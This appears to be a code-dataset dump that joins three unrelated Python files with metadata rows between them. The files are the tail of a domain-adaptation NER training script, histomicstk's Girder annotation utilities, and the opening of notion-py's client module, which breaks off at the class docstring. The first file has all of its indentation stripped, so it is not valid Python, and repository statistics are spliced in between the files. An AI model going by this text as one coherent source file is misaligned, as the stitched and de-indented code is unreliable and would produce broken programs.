# Class-importance-weighted domain adaptation with IW estimated on-the-fly
im_weights_init = None
if args.alpha_im_weights_init > 0:
# Initialize importance weights from model output on training datasets
im_weights_estimator = domain_alignment.ImWeightsEstimator(num_labels, source_class_dist, hard_confusion_mtx=args.hard_confusion_mtx, confusion_mtx_agg_mode='mean')
im_weights_estimator.to(args.device)
# Iterate over the training datasets, and feed model outputs to IW estimator
model.eval()
for is_target_dom, dataloader in enumerate([train_dataloader_source, train_dataloader_target]):
for step, batch in enumerate(dataloader):
with torch.no_grad():
# See main training loop for comments
batch = {k: v.to(args.device) for k, v in batch.items()}
outputs = model(**batch)
active_indices = torch.div((batch['labels']+100),100,rounding_mode='trunc') == 1
y_true = None if is_target_dom else flatten_outputs(~active_indices, batch['labels'])
y_proba = torch.nn.functional.softmax(flatten_outputs(~active_indices, outputs.logits), dim=-1)
# Collect statistics for importance weights estimation
im_weights_estimator(y_true=y_true, y_proba=y_proba, is_target_dom=is_target_dom)
# Limit num of training samples used to estimate importance weights
if args.max_samples_im_weights_init is not None and step+1 >= args.max_samples_im_weights_init:
break
# Get regularized importance weights
im_weights_init = im_weights_estimator.update_im_weights_qp() * args.alpha_im_weights_init + (1-args.alpha_im_weights_init)
im_weights_estimator = domain_alignment.ImWeightsEstimator(num_labels, source_class_dist, im_weights_init=im_weights_init.detach().cpu(), hard_confusion_mtx=args.hard_confusion_mtx)
im_weights_estimator.to(args.device)
model_ad.get_im_weights = im_weights_estimator.get_im_weights
optimizer_ad_grouped_parameters = []
if args.domain_alignment_loss in ['w1','jsd']:
optimizer_ad_grouped_parameters.extend([
{
"params": [p for n, p in model_ad.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay_adversary,
'lr': args.lr_adversary,
}, {
"params": [p for n, p in model_ad.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
'lr': args.lr_adversary,
}
])
if im_weights_estimator is not None:
optimizer_ad_grouped_parameters.extend([
{
"params": [p for n, p in im_weights_estimator.named_parameters()],
"weight_decay": args.weight_decay_im_weights,
'lr': args.lr_im_weights,
}
])
if optimizer_ad_grouped_parameters:
optimizer_ad = AdamW(optimizer_ad_grouped_parameters)
# Train!
total_batch_size = args.train_batch_size_per_domain * args.grad_accumulation_steps
logger.info(f"Run arguments: {vars(args)}")
logger.info("***** Running training *****")
logger.info(f" Num examples source = {len(train_dataset_source)}")
if train_dataloader_target is not None:
logger.info(f" Num examples target = {len(train_dataset_target)}")
logger.info(f" Num Epochs = {args.num_train_epochs}")
logger.info(f" Instantaneous batch size per device = {args.train_batch_size_per_domain}")
logger.info(f" Total train batch size (w. accumulation) = {total_batch_size}")
logger.info(f" Gradient Accumulation steps = {args.grad_accumulation_steps}")
logger.info(f" Total optimization steps = {args.num_train_steps}")
if args.domain_alignment and args.use_im_weights:
target_class_dist_estimate = [float("{0:0.4f}".format(i)) for i in (source_class_dist * model_ad.get_im_weights().detach().cpu()).numpy()]
logger.info(f" Estimated target class distribution (init) = {target_class_dist_estimate}")
# Only show the progress bar once on each machine.
progress_bar = tqdm(range(args.num_train_steps))
completed_steps = 0
train_dataloaders = (train_dataloader_source,) + ((train_dataloader_target,) if train_dataloader_target is not None else ())
eval_dataloaders = (eval_dataloader_source,) + ((eval_dataloader_target,) if eval_dataloader_target is not None else ())
for epoch in range(args.num_train_epochs):
model.train()
iterators = [iter(x) for x in train_dataloaders]
step = 0
while True:
# Get the next batch of data from source and target domains
batches = []
try:
batches.append(next(iterators[0]))
except StopIteration:
break
if len(iterators) > 1:
try:
batches.append(next(iterators[1]))
except StopIteration:
iterators[1] = iter(train_dataloaders[1])
batches.append(next(iterators[1]))
# Keep the features and labels for domain alignment
features = []
source_dom_labels = None
joint_loss = 0
for is_target_dom, batch in enumerate(batches):
batch = {k: v.to(args.device) for k, v in batch.items()}
# We need `hidden_states` to get features that are used by the linear
# classification head, for domain alignment.
outputs = model(**batch, output_hidden_states=True)
if not is_target_dom:
loss = outputs.loss
loss = loss / args.grad_accumulation_steps
joint_loss += loss
if args.domain_alignment:
# Mask out inputs that are not to be labeled.
#
# This mask should be available to both source and target domain inputs
# from preprocessing (e.g. only first wordpiece of each word is to be
# labeled in most NER implementations).
#
# For our NER experiments, the masked out (non-active) tokens are ones
# with the label -100. See `load_dataset_token_cls.py`.
active_indices = torch.div((batch['labels']+100),100,rounding_mode='trunc') == 1
# Update importance weights statistics and get its loss
y_proba = torch.nn.functional.softmax(flatten_outputs(~active_indices, outputs.logits), dim=-1).detach()
y_true = None if is_target_dom else flatten_outputs(~active_indices, batch['labels'])
if im_weights_estimator is not None:
im_weights_estimator(y_true=y_true, y_proba=y_proba, is_target_dom=is_target_dom, s=args.lr_confusion_mtx)
loss_iw = im_weights_estimator.get_im_weights_loss()
loss_iw = loss_iw / args.grad_accumulation_steps
joint_loss += loss_iw
# Get features for domain alignment
feature = flatten_outputs(~active_indices, outputs.hidden_states[-1])
if args.use_cdan_features:
# CDAN features are kronecker product of model features and output softmax
feature = torch.bmm(y_proba.unsqueeze(2), feature.unsqueeze(1)).view(-1,y_proba.size(1) * feature.size(1))
features.append(feature)
if not is_target_dom:
source_dom_labels = y_true
if args.domain_alignment:
domain_labels = torch.cat([torch.zeros(len(features[0])).long(),torch.ones(len(features[1])).long()]).to(args.device)
features_concat = torch.cat(features, dim=0)
# Gradually ramp up strength of domain alignment
lambda_domain_alignment = args.lambda_domain_alignment
if args.warmup_ratio_domain_alignment > 0:
lambda_domain_alignment *= min(1,completed_steps/(args.num_train_steps*args.warmup_ratio_domain_alignment))
if args.domain_alignment_loss == 'mmd':
lambda_domain_alignment *= -1
features_concat = domain_alignment.GradientReversalLayer(lambda_domain_alignment)(features_concat)
# `alpha` is an importance weights regularizer in early stages of training
alpha_im_weights = 1
if args.warmup_ratio_im_weights > 0:
alpha_im_weights *= min(1,completed_steps/(args.num_train_steps*args.warmup_ratio_im_weights))
loss_ad = model_ad(features_concat, domain_labels, y_true=source_dom_labels, alpha=alpha_im_weights)
loss_ad = loss_ad / args.grad_accumulation_steps
joint_loss += loss_ad
# Compute gradient penalty
if args.domain_alignment_loss != 'mmd' and args.lambda_grad_penalty > 0:
grad_penalty = domain_alignment.calc_gradient_penalty(model_ad.net, *[feature.detach() for feature in features])
grad_penalty = args.lambda_grad_penalty * grad_penalty / args.grad_accumulation_steps
joint_loss += grad_penalty
# Back-propagate the (joint) source classification (and domain alignment) loss
joint_loss.backward()
# Update parameters
if step % args.grad_accumulation_steps == 0 or step == len(train_dataloader_source) - 1:
optimizer.step()
lr_scheduler.step()
optimizer.zero_grad()
if optimizer_ad is not None:
optimizer_ad.step()
optimizer_ad.zero_grad()
progress_bar.update(1)
completed_steps += 1
if completed_steps >= args.num_train_steps:
break
step += 1
model.eval()
eval_metric = {}
for is_target_dom, dataloader in enumerate(eval_dataloaders):
for step, batch in enumerate(dataloader):
batch = {k: v.to(args.device) for k, v in batch.items()}
with torch.no_grad():
outputs = model(**batch)
predictions = outputs.logits.argmax(dim=-1)
labels = batch["labels"]
preds, refs = get_labels(predictions, labels)
metric.add_batch(predictions=preds,references=refs)
this_metric = compute_metrics()
eval_metric.update({k+('/target' if is_target_dom else '/source'):v for k,v in this_metric.items()})
# Print estimated target domain class distribution
if args.domain_alignment and args.use_im_weights and args.estimate_im_weights:
target_class_dist_estimate = [float("{0:0.4f}".format(i)) for i in (source_class_dist * model_ad.get_im_weights().detach().cpu()).numpy()]
eval_metric['target_class_dist_estimate'] = target_class_dist_estimate
logger.info(f"epoch {epoch+1}: {eval_metric}")
if args.output_dir is not None:
model.save_pretrained(args.output_dir)
def parse_args():
parser = argparse.ArgumentParser(description="Finetune a transformers model on a token classification task (NER)")
parser.add_argument("--dataset_name_source", type=str, default=None, help="The name of the dataset to use (via the datasets library). Source domain.")
parser.add_argument("--dataset_config_name_source", type=str, default=None, help="The configuration name of the dataset to use (via the datasets library). Source domain.")
parser.add_argument("--train_file_source", type=str, default=None, help="A csv or a json file containing the training data. Source domain.")
parser.add_argument("--evaluation_file_source", type=str, default=None, help="A csv or a json file containing the evaluation data. Source domain.")
parser.add_argument("--text_column_name_source", type=str, default=None, help="The column name of text to input in the file (a csv or JSON file). Source domain.")
parser.add_argument("--label_column_name_source", type=str, default=None, help="The column name of label to input in the file (a csv or JSON file). Source domain.")
parser.add_argument("--dataset_name_target", type=str, default=None, help="The name of the dataset to use (via the datasets library). Target domain.")
parser.add_argument("--dataset_config_name_target", type=str, default=None, help="The configuration name of the dataset to use (via the datasets library). Target domain.")
parser.add_argument("--train_file_target", type=str, default=None, help="A csv or a json file containing the training data. Target domain.")
parser.add_argument("--evaluation_file_target", type=str, default=None, help="A csv or a json file containing the evaluation data. Target domain.")
parser.add_argument("--text_column_name_target", type=str, default=None, help="The column name of text to input in the file (a csv or JSON file). Target domain.")
parser.add_argument("--label_column_name_target", type=str, default=None, help="The column name of label to input in the file (a csv or JSON file). Target domain.")
parser.add_argument("--task_name", type=str, default="ner", choices=["ner", "pos", "chunk"], help="The name of the task.")
parser.add_argument("--label_all_tokens", action="store_true", help="Setting labels of all special tokens to -100 and thus PyTorch will ignore them.")
parser.add_argument("--return_entity_level_metrics", action="store_true", help="Indication whether entity level metrics are to be returned.")
parser.add_argument("--max_length", type=int, default=512, help="The maximum total input sequence length after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded if `--pad_to_max_length` is passed.")
parser.add_argument("--pad_to_max_length", action="store_true", help="If passed, pad all samples to `max_length`. Otherwise, dynamic padding is used.")
parser.add_argument("--model_name_or_path", type=str, help="Path to pre-trained model or model identifier from huggingface.co/models.", required=True)
parser.add_argument("--tokenizer_name", type=str, default=None, help="Pre-trained tokenizer name or path if not the same as model_name")
parser.add_argument("--output_dir", type=str, default=None, help="Where to store the final model.")
parser.add_argument("--num_train_epochs", type=int, default=4, help="Total number of training epochs to perform.")
parser.add_argument("--num_train_steps", type=int, default=None, help="Total number of training steps to perform. If provided, overrides num_train_epochs.")
parser.add_argument("--train_batch_size_per_domain", type=int, default=8, help="Batch size (per domain) for the training dataloader.")
parser.add_argument("--eval_batch_size", type=int, default=8, help="Batch size for the evaluation dataloader.")
parser.add_argument("--grad_accumulation_steps", type=int, default=1, help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument("--lr", type=float, default=1e-5, help="Initial learning rate (after the potential warmup period) to use.")
parser.add_argument("--weight_decay", type=float, default=0.01, help="Weight decay to use.")
parser.add_argument("--lr_scheduler_type", type=SchedulerType, default="linear", help="The scheduler type to use.", choices=["linear", "cosine", "cosine_with_restarts", "polynomial", "constant", "constant_with_warmup"])
parser.add_argument("--warmup_ratio", type=float, default=0.1, help="Ratio of training steps for the warmup in the lr scheduler.")
parser.add_argument("--domain_alignment", action="store_true", help="Perform adversarial domain alignment.")
parser.add_argument("--domain_alignment_loss", type=str, default='w1', choices=['w1','jsd','mmd'], help="Loss for domain alignment.")
parser.add_argument("--lambda_domain_alignment", type=float, default=5e-3, help="Strength of the domain alignment.")
parser.add_argument("--warmup_ratio_domain_alignment", type=float, default=0.1, help="Ratio of training steps for warming up the strength of domain alignment.")
parser.add_argument("--use_cdan_features", action="store_true", help="Use CDAN features (Long et al., 2018).")
parser.add_argument("--lr_adversary", type=float, default=5e-4, help="Learning rate of adversary. (Only applicable if `domain_alignment_loss` is `w1` or `jsd`.)")
parser.add_argument("--weight_decay_adversary", type=float, default=0.01, help="Weight decay for adversary to use. (Only applicable if `domain_alignment_loss` is `w1` or `jsd`.)")
parser.add_argument("--lambda_grad_penalty", type=float, default=10, help="Strength of the gradient penalty. (Only applicable if `domain_alignment_loss` is `w1` or `jsd`.)")
parser.add_argument("--hidden_size_adversary", type=int, default=2048, help="Width of adversarial network hidden layer. (Only applicable if `domain_alignment_loss` is `w1` or `jsd`.)")
parser.add_argument("--mmd_kernel_num", type=int, default=5, help="Number of kernels in the MMD layer. (Only applicable if `domain_alignment_loss` is `mmd`.)")
parser.add_argument("--mmd_kernel_mul", type=float, default=2.0, help='Multiplicative factor of kernel bandwidth. (Only applicable if `domain_alignment_loss` is `mmd`.)')
parser.add_argument("--mmd_fix_sigma", type=float, default=None, help="Fix kernel bandwidth, otherwise dynamically adjusted according to l2 distance between pairs of data. (Only applicable if `domain_alignment_loss` is `mmd`.)")
parser.add_argument("--use_im_weights", action="store_true", help="Use class-importance weighting for domain adversary. If not `estimate_im_weights` and `target_class_dist` is not provided then they are inferred from labeled target domain data.")
parser.add_argument("--target_class_dist", type=float, nargs="+", default=None, help="Target domain (training data) class prior distribution.")
parser.add_argument("--estimate_im_weights", action="store_true", help="Estimate class-importance weights.")
parser.add_argument("--lr_im_weights", type=float, default=5e-4, help="Learning rate for importance weights.")
parser.add_argument("--weight_decay_im_weights", type=float, default=2, help="Strength of importance weights ell_2 regularization.")
parser.add_argument("--warmup_ratio_im_weights", type=float, default=0.1, help="Ratio of training steps for reducing the regularization on importance weights, as initial estimates could be inaccurate.")
parser.add_argument("--lr_confusion_mtx", type=float, default=5e-3, help="Learning rate for statistics used to estimate importance weights.")
parser.add_argument("--hard_confusion_mtx", action="store_true", help="Use hard label statistics for estimating importance weights.")
parser.add_argument("--alpha_im_weights_init", type=float, default=0.75, help="If non-zero, replace uniformly initialized importance weights with statistics from pre-trained model by this ratio.")
parser.add_argument("--max_samples_im_weights_init", type=int, default=None, help="Max number of training samples to use for initializing importance weight estimates.")
parser.add_argument("--seed", type=int, default=None, help="A seed for reproducible training.")
parser.add_argument("--device", type=str, default="cpu", help="Device to train on, e.g. `cpu` or `cuda`.")
parser.add_argument("--disable_tqdm", action="store_true", help="Silence `tqdm` progress bars.")
args = parser.parse_args()
# Sanity checks
if args.task_name is None and args.train_file_source is None and args.evaluation_file_source is None:
raise ValueError("Need either a task name or a training/evaluation file.")
else:
if args.train_file_source is not None:
extension = args.train_file_source.split(".")[-1]
assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
if args.evaluation_file_source is not None:
extension = args.evaluation_file_source.split(".")[-1]
assert extension in ["csv", "json"], "`evaluation_file` should be a csv or a json file."
return args
if __name__ == "__main__":
main()
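# A hedged example invocation (the model and dataset names below are
# illustrative placeholders, not defaults or recommendations of this script):
#
#   python run_token_cls.py \
#       --model_name_or_path bert-base-cased \
#       --dataset_name_source conll2003 \
#       --dataset_name_target wnut_17 \
#       --domain_alignment --domain_alignment_loss w1 \
#       --device cuda --output_dir ./output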
| 56.177391
| 250
| 0.674664
|
bf2e05047680922b9006cab4acbaa385f85c5b57
| 17,737
|
py
|
Python
|
histomicstk/utils/girder_convenience_utils.py
|
basanto/HistomicsTK
|
f3dbd93a7f31c7825574f9ccf0b86e09e9fee360
|
[
"Apache-2.0"
] | 3
|
2022-02-23T09:43:53.000Z
|
2022-03-21T22:32:05.000Z
|
histomicstk/utils/girder_convenience_utils.py
|
basanto/HistomicsTK
|
f3dbd93a7f31c7825574f9ccf0b86e09e9fee360
|
[
"Apache-2.0"
] | null | null | null |
histomicstk/utils/girder_convenience_utils.py
|
basanto/HistomicsTK
|
f3dbd93a7f31c7825574f9ccf0b86e09e9fee360
|
[
"Apache-2.0"
] | 3
|
2020-04-22T19:40:18.000Z
|
2021-02-03T07:31:45.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 12 13:19:18 2019
@author: tageldim
"""
# import os
import os
import girder_client
import json
from histomicstk.workflows.workflow_runner import Workflow_runner, \
Slide_iterator, Annotation_iterator
# import warnings
# warnings.simplefilter('once', UserWarning)
def connect_to_api(apiurl, apikey=None, interactive=True):
"""Connect to a specific girder API.
Parameters
----------
apiurl : str
        URL of the API to connect to.
apikey : str
API authentication token key
interactive : bool
Whether to use interactive mode instead.
Returns
-------
girder_client.GirderClient
Authenticated girder client.
"""
assert interactive or (apikey is not None)
gc = girder_client.GirderClient(apiUrl=apiurl)
if apikey is not None:
interactive = False
if interactive:
gc.authenticate(interactive=True)
else:
gc.authenticate(apiKey=apikey)
return gc
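# A minimal connection sketch (the URL and key below are placeholders, not
# values shipped with this module): authenticate non-interactively with an
# API key.
def _example_connect():
    gc = connect_to_api(
        apiurl='https://your-girder-server/api/v1',  # placeholder
        apikey='YOUR_API_KEY',  # placeholder
        interactive=False)
    return gc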
def get_absolute_girder_folderpath(gc, folder_id=None, folder_info=None):
"""Get absolute path for a girder folder.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
folder_id : str
girder id of folder
folder_info : dict
folder info from the girder server
Returns
-------
str
absolute path to folder in the girder server.
"""
assert any([j is not None for j in (folder_id, folder_info)])
if folder_id is not None:
folder_info = gc.get('/folder/%s' % folder_id)
fpath = gc.get('/folder/%s/rootpath' % folder_info['_id'])
fpath = "/".join([
j['object']['name'] for j in fpath
if j['object']['_modelType'] == 'folder'
]) + "/" + folder_info['name'] + "/"
return fpath
def update_permissions_for_annotation(
gc, annotation_id=None, annotation=None,
groups_to_add=None, replace_original_groups=True,
users_to_add=None, replace_original_users=True):
"""Update permissions for a single annotation.
Parameters
----------
gc : gider_client.GirderClient
authenticated girder client instance
annotation_id : str
girder id of annotation
annotation : dict
overrides annotation_id if given
groups_to_add : list
each entry is a dict containing the information about user groups
to add and their permission levels. A sample entry must have the
following keys
- level, int -> 0 (view), 1 (edit) or 2 (owner)
- name, str -> name of user group
          - id, str -> girder id of user group
replace_original_groups : bool
whether to replace original groups or append to them
users_to_add : list
each entry is a dict containing the information about user
to add and their permission levels. A sample entry must have the
following keys
- level, int -> 0 (view), 1 (edit) or 2 (owner)
- login, str -> username of user
          - id, str -> girder id of user
    replace_original_users : bool
whether to replace original users or append to them
Returns
-------
dict
server response
"""
groups_to_add = [] if groups_to_add is None else groups_to_add
users_to_add = [] if users_to_add is None else users_to_add
if annotation is not None:
annotation_id = annotation['_id']
elif annotation_id is None:
raise Exception(
"You must provide either the annotation or its girder id.")
# get current permissions
current = gc.get('/annotation/%s/access' % annotation_id)
# add or replace as needed
if replace_original_groups:
current['groups'] = []
current_group_ids = []
else:
current_group_ids = [j['id'] for j in current['groups']]
if replace_original_users:
current['users'] = []
current_user_ids = []
else:
current_user_ids = [j['id'] for j in current['users']]
for group in groups_to_add:
if group['id'] not in current_group_ids:
current['groups'].append(group)
for user in users_to_add:
if user['id'] not in current_user_ids:
current['users'].append(user)
# now update accordingly
# BAD WAY!! -- do NOT do this!
# return gc.put('/annotation/%s/access?access=%s' % (
# annotation_id, json.dumps(current)))
# PROPER WAY
return gc.put('/annotation/%s/access' % annotation_id, data={
'access': json.dumps(current)})
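# A hedged sketch of the `groups_to_add` / `users_to_add` payloads described in
# the docstring above; all ids, names and logins are placeholders.
def _example_update_permissions(gc):
    groups_to_add = [{'level': 0, 'name': 'pathologists', 'id': 'GROUP_GIRDER_ID'}]
    users_to_add = [{'level': 2, 'login': 'jdoe', 'id': 'USER_GIRDER_ID'}]
    return update_permissions_for_annotation(
        gc, annotation_id='ANNOTATION_GIRDER_ID',
        groups_to_add=groups_to_add, users_to_add=users_to_add)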
def update_permissions_for_annotations_in_slide(
gc, slide_id, verbose=0, monitorPrefix='', **kwargs):
"""Update permissions for all annotations in a slide.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
slide_id : str
girder id of slide
verbose : int
level of verbosity
monitorPrefix : str
prefix to prepend to printed statements
kwargs
passed as-is to update_permissions_for_annotation()
Returns
-------
list
each entry is a dict of the server response.
"""
anniter = Annotation_iterator(
gc=gc, slide_id=slide_id,
callback=update_permissions_for_annotation,
callback_kwargs=kwargs,
verbose=verbose, monitorPrefix=monitorPrefix)
return anniter.apply_callback_to_all_annotations()
def update_permissions_for_annotations_in_folder(
gc, folderid, workflow_kwargs, recursive=True,
monitor='', verbose=True):
"""Update permissions for all annotations in a folder recursively.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
folderid : str
girder id of folder
workflow_kwargs : dict
kwargs to pass to update_permissions_for_annotations_in_slide()
recursive : bool
do this recursively for subfolders?
monitor : str
text to prepend to printed statements
verbose : bool
print statements to screen?
Returns
-------
None
"""
# update permissions for each slide in folder
workflow_kwargs.update({'gc': gc})
workflow_runner = Workflow_runner(
slide_iterator=Slide_iterator(
gc, source_folder_id=folderid,
keep_slides=None,
),
workflow=update_permissions_for_annotations_in_slide,
workflow_kwargs=workflow_kwargs,
recursive=recursive,
monitorPrefix=monitor,
verbose=verbose,
)
workflow_runner.run()
def update_styles_for_annotation(gc, annotation, changes):
"""Update styles for all relevant elements in an annotation.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
annotation : dict
annotation
changes : dict
indexed by current group name to be updated, and values are
the new styles. Each element in ann["annotation"]["elements"]
whose current "group" attribute is in this dict's keys is
updated according to the new style.
Returns
-------
dict
server response
"""
# find out if annotation needs editing
if 'groups' not in annotation.keys():
return
elif not any([g in changes.keys() for g in annotation['groups']]):
return
# edit elements one by one
for el in annotation['annotation']['elements']:
if el['group'] in changes.keys():
el.update(changes[el['group']])
# print(" updating ...")
return gc.put(
"/annotation/%s" % annotation['_id'], json=annotation['annotation'])
def update_styles_for_annotations_in_slide(
gc, slide_id, verbose=0, monitorPrefix='', callback=None, **kwargs):
"""Update styles for all annotations in a slide.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
slide_id : str
girder id of slide
verbose : int
level of verbosity
monitorPrefix : str
prefix to prepend to printed statements
callback : function
if None, defaults to update_styles_for_annotation. Passed as-is
to histomicstk.workflows.workflow_runner.Annotation_iterator
kwargs
passed as-is to the update_styles_for_annotation
Returns
-------
list
each entry is a dict of the server response.
"""
if callback is None:
callback = update_styles_for_annotation
anniter = Annotation_iterator(
gc=gc, slide_id=slide_id,
callback=callback,
callback_kwargs=kwargs,
verbose=verbose, monitorPrefix=monitorPrefix)
return anniter.apply_callback_to_all_annotations()
def update_styles_for_annotations_in_folder(
gc, folderid, workflow_kwargs, recursive=True,
catch_exceptions=True, monitor='', verbose=True):
"""Update styles for all annotations in a folder recursively.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
folderid : str
girder id of folder
workflow_kwargs : dict
kwargs to pass to Update styles for all annotations in a slide()
recursive : bool
do this recursively for subfolders?
catch_exceptions : bool
passed as-is to histomicstk.workflows.workflow_runner.Workflow_runner
monitor : str
text to prepend to printed statements
verbose : bool
print statements to screen?
Returns
-------
None
"""
# update annotation styles
workflow_kwargs.update({'gc': gc})
workflow_runner = Workflow_runner(
slide_iterator=Slide_iterator(
gc, source_folder_id=folderid,
keep_slides=None,
),
workflow=update_styles_for_annotations_in_slide,
workflow_kwargs=workflow_kwargs,
recursive=recursive,
catch_exceptions=catch_exceptions,
monitorPrefix=monitor,
verbose=verbose,
)
workflow_runner.run()
def revert_annotation(
gc, annotation_id=None, annotation=None, version=None,
revert_to_nonempty_elements=False, only_revert_if_empty=True):
"""Revert an annotation to a previous version.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
annotation_id : str
girder id of annotation
annotation : dict
overrides annotation_id if given
version : int
        version number for the annotation. If None, and
        not revert_to_nonempty_elements,
        the default behavior of the endpoint is invoked, which reverts the
annotation if it was deleted and if not, reverts to the last version.
revert_to_nonempty_elements : bool
if true, reverts to the most recent version of the annotation
with non-empty elements.
only_revert_if_empty : bool
if true, only reverts annotation if it contains an empty element list
Returns
-------
dict
server response
"""
if annotation is not None:
annotation_id = annotation['_id']
elif annotation_id is None:
raise Exception(
"You must provide either the annotation or its girder id.")
history = gc.get("/annotation/%s/history" % annotation_id)
# no need to revert if empty
if only_revert_if_empty and len(history[0]["groups"]) > 0:
return dict()
# cannot revert if only version
if len(history) < 2:
return dict()
if (version is None) and revert_to_nonempty_elements:
# NOTE: even though the "history" may show
# the elements as empty, the "groups" attribute is really the
# indication if the annotation version actually has some elements.
# TODO -- This is likely a bug (?); fix me!!!
for ver in history:
if len(ver["groups"]) > 0:
version = ver['_version']
break
ver = "" if version is None else "?version=%d" % version
# if version is None:
# print(" Reverting ...")
# else:
# print(" Reverting to version %d" % version)
return gc.put("/annotation/%s/history/revert%s" % (annotation_id, ver))
def revert_annotations_in_slide(
gc, slide_id, verbose=0, monitorPrefix='', **kwargs):
"""Revert all annotations in a slide to a previous version.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
slide_id : str
girder id of slide
verbose : int
level of verbosity
monitorPrefix : str
prefix to prepend to printed statements
kwargs
passed as-is to the revert_annotation
Returns
-------
list
each entry is a dict of the server response.
"""
anniter = Annotation_iterator(
gc=gc, slide_id=slide_id,
callback=revert_annotation,
callback_kwargs=kwargs,
verbose=verbose, monitorPrefix=monitorPrefix)
return anniter.apply_callback_to_all_annotations()
def revert_annotations_in_folder(
gc, folderid, workflow_kwargs, recursive=True,
monitor='', verbose=True):
"""Revert all annotations in a folder recursively.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
folderid : str
girder id of folder
workflow_kwargs : dict
kwargs to pass to revert_annotations_in_slide
recursive : bool
do this recursively for subfolders?
monitor : str
text to prepend to printed statements
verbose : bool
print statements to screen?
Returns
-------
None
"""
# update annotation styles
workflow_kwargs.update({'gc': gc})
workflow_runner = Workflow_runner(
slide_iterator=Slide_iterator(
gc, source_folder_id=folderid,
keep_slides=None,
),
workflow=revert_annotations_in_slide,
workflow_kwargs=workflow_kwargs,
recursive=recursive,
monitorPrefix=monitor,
verbose=verbose,
)
workflow_runner.run()
# %%===========================================================================
def reproduce_annotations_workflow(
gc, folderid, annotation_jsonfile, monitorPrefix=''):
"""Dump annotations into single slide from local folder.
Parameters
-----------
gc : girder_client.GirderClient
authenticated girder client instance
folderid : str
girder id of girder folder to post reproduced annotations.
annotation_jsonfile : str
path to annotation json file
monitorPrefix : str
prefix to monitor string
"""
try:
# extract name + path
itemname = os.path.basename(annotation_jsonfile).replace(
'_annotations.json', '')
local = os.path.dirname(annotation_jsonfile)
# copy item without annotations
with open(os.path.join(local, itemname + '.json'), 'r') as jf:
source_item_info = json.load(jf)
print("%s: copy item" % monitorPrefix)
item = gc.post(
            '/item/%s/copy?folderId=%s&name=%s&copyAnnotations=False'
% (source_item_info['_id'], folderid, itemname))
# load annotations
with open(annotation_jsonfile) as af:
annotations = json.load(af)
# now post
n_annotations = len(annotations)
for anno, annotation in enumerate(annotations):
try:
print("%s: post annotation %d of %d" % (
monitorPrefix, anno, n_annotations))
_ = gc.post(
"/annotation?itemId=" + item['_id'],
json=annotation['annotation'])
except Exception as e:
print(e.__repr__())
except Exception as e:
print(e.__repr__())
def reproduce_annotations_from_backup(gc, folderid, local):
"""Reproduce annotations on HistomicsUI from local backup.
    This is the reverse of dump_annotations_locally(); it reproduces the
    dumped tiered structure on HistomicsUI. The original slides (items)
    must still be present in the folder from which the backup was made,
    because they will be copied (without annotations) before the local
    annotations (from JSON files) are posted to them.
Parameters
-----------
gc : girder_client.GirderClient
authenticated girder client instance
folderid : str
girder id of girder folder to post reproduced annotations.
local : str
local path to get subfolders/slides/annotations
"""
monitor = os.path.basename(local)
# for each slide, copy it and post annotations
jsonfiles = [
os.path.join(local, j) for j in os.listdir(local)
if j.endswith('_annotations.json')]
for jsonfile in jsonfiles:
reproduce_annotations_workflow(
gc=gc, folderid=folderid, annotation_jsonfile=jsonfile,
monitorPrefix=monitor)
# for each subfolder, create a new folder on HistomicsUI and call self
subdirs = [
j for j in os.listdir(local) if os.path.isdir(os.path.join(local, j))]
for subdir in subdirs:
try:
# create folder in HistomicsUI
new_folder = gc.post('/folder?parentId=%s&name=%s' % (
folderid, subdir))
            # call self with the same parameters
reproduce_annotations_from_backup(
gc=gc, folderid=new_folder['_id'],
local=os.path.join(local, subdir))
except Exception as e:
print(e.__repr__())
# %%===========================================================================
| 30.062712
| 79
| 0.634718
|
fa7dbda69466124a2fcd097de4441ea80b91dd93
| 16,401
|
py
|
Python
|
notion/client.py
|
AndreCNF/notion-py
|
9ae836ec0f49d86de53d68f32bde6c65ba262511
|
[
"MIT"
] | null | null | null |
notion/client.py
|
AndreCNF/notion-py
|
9ae836ec0f49d86de53d68f32bde6c65ba262511
|
[
"MIT"
] | null | null | null |
notion/client.py
|
AndreCNF/notion-py
|
9ae836ec0f49d86de53d68f32bde6c65ba262511
|
[
"MIT"
] | null | null | null |
import hashlib
import json
import re
import uuid
from requests import Session, HTTPError
from requests.cookies import cookiejar_from_dict
from urllib.parse import urljoin
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
from getpass import getpass
from time import sleep
from .block import Block, BLOCK_TYPES
from .collection import (
Collection,
CollectionView,
CollectionRowBlock,
COLLECTION_VIEW_TYPES,
TemplateBlock,
)
from .logger import logger
from .monitor import Monitor
from .operations import operation_update_last_edited, build_operation
from .settings import API_BASE_URL
from .space import Space
from .store import RecordStore
from .user import User
from .utils import extract_id, now
def create_session(client_specified_retry=None):
"""
retry on 502
"""
session = Session()
if client_specified_retry:
retry = client_specified_retry
else:
retry = Retry(
5,
backoff_factor=0.3,
status_forcelist=(502, 503, 504),
            # CAUTION: 'POST' is included in this list even though it is not technically idempotent
method_whitelist=(
"POST",
"HEAD",
"TRACE",
"GET",
"PUT",
"OPTIONS",
"DELETE",
),
)
adapter = HTTPAdapter(max_retries=retry)
session.mount("https://", adapter)
return session
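# Hedged sketch (commented out; not part of the original module): a caller can
# pass its own urllib3 Retry policy to create_session(), e.g. to avoid
# retrying non-idempotent POSTs. The values below are illustrative only.
#
#   custom_retry = Retry(
#       total=3, backoff_factor=1.0,
#       status_forcelist=(502, 503, 504),
#       method_whitelist=("GET", "HEAD", "OPTIONS"))
#   session = create_session(client_specified_retry=custom_retry)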
class NotionClient(object):
"""
This is the entry point to using the API. Create an instance of this class, passing it the value of the
"token_v2" cookie from a logged-in browser session on Notion.so. Most of the methods on here are primarily
for internal use -- the main one you'll likely want to use is `get_block`.
"""
